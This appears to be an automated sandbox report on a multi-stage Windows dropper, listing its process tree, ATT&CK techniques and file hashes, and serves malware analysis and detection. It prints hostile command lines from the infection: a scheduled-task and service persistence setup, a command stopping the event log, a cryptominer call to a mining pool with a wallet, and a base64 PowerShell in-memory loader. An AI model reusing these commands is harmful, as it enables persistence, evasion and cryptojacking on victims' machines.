Tweeter%20Traffic.exevbc.exe

pid process

1080 Tweeter%20Traffic.exe
1080 Tweeter%20Traffic.exe
4016 vbc.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Tweeter%20Traffic.exe

pid process

1080 Tweeter%20Traffic.exe
1080 Tweeter%20Traffic.exe

pid	process
1080	Tweeter%20Traffic.exe
1080	Tweeter%20Traffic.exe
4016	vbc.exe

pid	process
1080	Tweeter%20Traffic.exe
1080	Tweeter%20Traffic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

FUCKER.exemomsstiflersdgjboigfnbio.exevmtoolsd.exevmtoolsd.execmd.exema.execmd.exe.execmd.exeinstaller.exeinstaller.tmp

description	pid	process	target process
PID 4668 wrote to memory of 3788	4668	FUCKER.exe	2.3.1.1.exe
PID 4668 wrote to memory of 3788	4668	FUCKER.exe	2.3.1.1.exe
PID 4668 wrote to memory of 3788	4668	FUCKER.exe	2.3.1.1.exe
PID 4668 wrote to memory of 1080	4668	FUCKER.exe	Tweeter%20Traffic.exe
PID 4668 wrote to memory of 1080	4668	FUCKER.exe	Tweeter%20Traffic.exe
PID 4668 wrote to memory of 1080	4668	FUCKER.exe	Tweeter%20Traffic.exe
PID 4668 wrote to memory of 2400	4668	FUCKER.exe	funta.exe
PID 4668 wrote to memory of 2400	4668	FUCKER.exe	funta.exe
PID 4668 wrote to memory of 2400	4668	FUCKER.exe	funta.exe
PID 4668 wrote to memory of 2540	4668	FUCKER.exe	momsstiflersdgjboigfnbio.exe
PID 4668 wrote to memory of 2540	4668	FUCKER.exe	momsstiflersdgjboigfnbio.exe
PID 2540 wrote to memory of 4152	2540	momsstiflersdgjboigfnbio.exe	vmtoolsd.exe
PID 2540 wrote to memory of 4152	2540	momsstiflersdgjboigfnbio.exe	vmtoolsd.exe
PID 2540 wrote to memory of 4152	2540	momsstiflersdgjboigfnbio.exe	vmtoolsd.exe
PID 4152 wrote to memory of 2984	4152	vmtoolsd.exe	vmtoolsd.exe
PID 4152 wrote to memory of 2984	4152	vmtoolsd.exe	vmtoolsd.exe
PID 4152 wrote to memory of 2984	4152	vmtoolsd.exe	vmtoolsd.exe
PID 2984 wrote to memory of 1920	2984	vmtoolsd.exe	cmd.exe
PID 2984 wrote to memory of 1920	2984	vmtoolsd.exe	cmd.exe
PID 2984 wrote to memory of 1920	2984	vmtoolsd.exe	cmd.exe
PID 2984 wrote to memory of 1920	2984	vmtoolsd.exe	cmd.exe
PID 1920 wrote to memory of 2736	1920	cmd.exe	MSBuild.exe
PID 1920 wrote to memory of 2736	1920	cmd.exe	MSBuild.exe
PID 1920 wrote to memory of 2736	1920	cmd.exe	MSBuild.exe
PID 1920 wrote to memory of 2736	1920	cmd.exe	MSBuild.exe
PID 1920 wrote to memory of 2736	1920	cmd.exe	MSBuild.exe
PID 4668 wrote to memory of 3852	4668	FUCKER.exe	ma.exe
PID 4668 wrote to memory of 3852	4668	FUCKER.exe	ma.exe
PID 3852 wrote to memory of 2024	3852	ma.exe	cmd.exe
PID 3852 wrote to memory of 2024	3852	ma.exe	cmd.exe
PID 2024 wrote to memory of 1728	2024	cmd.exe	timeout.exe
PID 2024 wrote to memory of 1728	2024	cmd.exe	timeout.exe
PID 2024 wrote to memory of 4520	2024	cmd.exe	.exe
PID 2024 wrote to memory of 4520	2024	cmd.exe	.exe
PID 4668 wrote to memory of 4568	4668	FUCKER.exe	ghjkl.exe
PID 4668 wrote to memory of 4568	4668	FUCKER.exe	ghjkl.exe
PID 4668 wrote to memory of 4568	4668	FUCKER.exe	ghjkl.exe
PID 4520 wrote to memory of 4840	4520	.exe	cmd.exe
PID 4520 wrote to memory of 4840	4520	.exe	cmd.exe
PID 4840 wrote to memory of 1888	4840	cmd.exe	schtasks.exe
PID 4840 wrote to memory of 1888	4840	cmd.exe	schtasks.exe
PID 4668 wrote to memory of 2324	4668	FUCKER.exe	installer.exe
PID 4668 wrote to memory of 2324	4668	FUCKER.exe	installer.exe
PID 4668 wrote to memory of 2324	4668	FUCKER.exe	installer.exe
PID 2324 wrote to memory of 1820	2324	installer.exe	installer.tmp
PID 2324 wrote to memory of 1820	2324	installer.exe	installer.tmp
PID 2324 wrote to memory of 1820	2324	installer.exe	installer.tmp
PID 1820 wrote to memory of 4824	1820	installer.tmp	netcorecheck_x64.exe
PID 1820 wrote to memory of 4824	1820	installer.tmp	netcorecheck_x64.exe
PID 1820 wrote to memory of 5052	1820	installer.tmp	netcorecheck_x64.exe
PID 1820 wrote to memory of 5052	1820	installer.tmp	netcorecheck_x64.exe
PID 1820 wrote to memory of 3572	1820	installer.tmp	netcorecheck_x64.exe
PID 1820 wrote to memory of 3572	1820	installer.tmp	netcorecheck_x64.exe
PID 1820 wrote to memory of 4992	1820	installer.tmp	netcorecheck_x64.exe
PID 1820 wrote to memory of 4992	1820	installer.tmp	netcorecheck_x64.exe
PID 4668 wrote to memory of 3164	4668	FUCKER.exe	Ama2.exe
PID 4668 wrote to memory of 3164	4668	FUCKER.exe	Ama2.exe
PID 4668 wrote to memory of 3164	4668	FUCKER.exe	Ama2.exe
PID 4520 wrote to memory of 4016	4520	.exe	vbc.exe
PID 4520 wrote to memory of 4016	4520	.exe	vbc.exe
PID 4520 wrote to memory of 4016	4520	.exe	vbc.exe
PID 4520 wrote to memory of 4016	4520	.exe	vbc.exe
PID 4520 wrote to memory of 4016	4520	.exe	vbc.exe
PID 4520 wrote to memory of 4016	4520	.exe	vbc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4668

C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe"
2⤵
- Executes dropped EXE
PID:3788

C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1396
3⤵
- Program crash
PID:4748

C:\Users\Admin\AppData\Local\Temp\Files\funta.exe
"C:\Users\Admin\AppData\Local\Temp\Files\funta.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2400

C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe
"C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2540

C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4152

C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe
"C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp31C4.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:1728

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:4840

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:1888

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4016

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Users\Admin\AppData\Local\Temp\Files\installer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2324

C:\Users\Admin\AppData\Local\Temp\is-AQB3U.tmp\installer.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AQB3U.tmp\installer.tmp" /SL5="$60220,3121405,832512,C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1820

C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 3.1.22
4⤵
- Executes dropped EXE
PID:4824

C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 5.0.13
4⤵
- Executes dropped EXE
PID:5052

C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 6.0.11
4⤵
- Executes dropped EXE
PID:3572

C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 7.0.0
4⤵
- Executes dropped EXE
PID:4992

C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
"C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"
2⤵
- Executes dropped EXE
PID:3192

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Users\Admin\AppData\Local\Temp\Files\123p.exe
"C:\Users\Admin\AppData\Local\Temp\Files\123p.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2412

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:2316

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:3816

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:2644

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:1516

C:\Users\Admin\AppData\Local\Temp\Files\mk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\mk.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"
2⤵
- Executes dropped EXE
PID:4216

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
PID:2732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
4⤵
PID:3120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:1980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:3520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:3196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1680
7⤵
- Program crash
PID:3124

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
"C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
2⤵
- Executes dropped EXE
PID:952

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
"C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2760

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
4⤵
- Executes dropped EXE
PID:1912

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3792

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
6⤵
- Executes dropped EXE
PID:1080

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2364

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
8⤵
- Executes dropped EXE
PID:888

C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
9⤵
- Executes dropped EXE
PID:760

C:\Users\Admin\AppData\Local\Temp\Files\conan.exe
"C:\Users\Admin\AppData\Local\Temp\Files\conan.exe"
2⤵
- Executes dropped EXE
PID:3060

C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 784
3⤵
- Program crash
PID:4928

C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1080 -ip 1080
1⤵
PID:4136

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2184

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:1844

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3196 -ip 3196
1⤵
PID:1708

C:\Users\Admin\AppData\Roaming\Eszop.exe
C:\Users\Admin\AppData\Roaming\Eszop.exe
1⤵
- Executes dropped EXE
PID:2024

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4912 -ip 4912
1⤵
PID:2156

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

T1064

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Files\123p.exe
Filesize
10.7MB

MD5
b091c4848287be6601d720997394d453

SHA1
9180e34175e1f4644d5fa63227d665b2be15c75b

SHA256
d0b06ca6ece3fef6671fa8acd3d560a9400891abcd10f5cedcfe7bd1e6050dfe

SHA512
a3b3663fd343389aee2cbf76f426401d436992b2b56cea3b60e9c2e385510fa874fa45b2ac75703074f0303934c4223eaee1983851374a2e753fd0302042cc5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe
Filesize
80KB

MD5
7fbe056c414472cc2fcc6362bb66d212

SHA1
0df63fe311154434f7d14aae2f29f47a6222b053

SHA256
aa1b0b2f6f06f622abf2128ecafed1929682221c5ff4dd2426f16b9ae272fdf9

SHA512
38edc08d3fd41c818ae9457e200ade74ac22aabc678adce6a99d4789b621e43b298ca8e4189be4e997f66559325d76ad941d604d4375175f174de8521e779220

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe
Filesize
3.1MB

MD5
b9c3c735a3d1eae297ca362bee3393ef

SHA1
4011c6ad06cf1be487e9f1bf293a278e480920fa

SHA256
5edf686e646728c40a9107c1fabd527e5c6c2bf1ac6ec7326fe77fcb19e35ab7

SHA512
400704f676245bb30cde6f524c88f5f040e6a60562c4de41cca5588a851679d852d42baa8abddd1d250ada1544185489066bc0613e1749a95263033a338b69fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
Filesize
466KB

MD5
9379b6e19fb3154d809f8ad97ff03699

SHA1
b6e4e709a960fbb12c05c97ed522d59da8a2decb

SHA256
e97b0117c7dc1aeb1ef08620ed6833ee61d01ce17c1e01f08aa2a51c5278beca

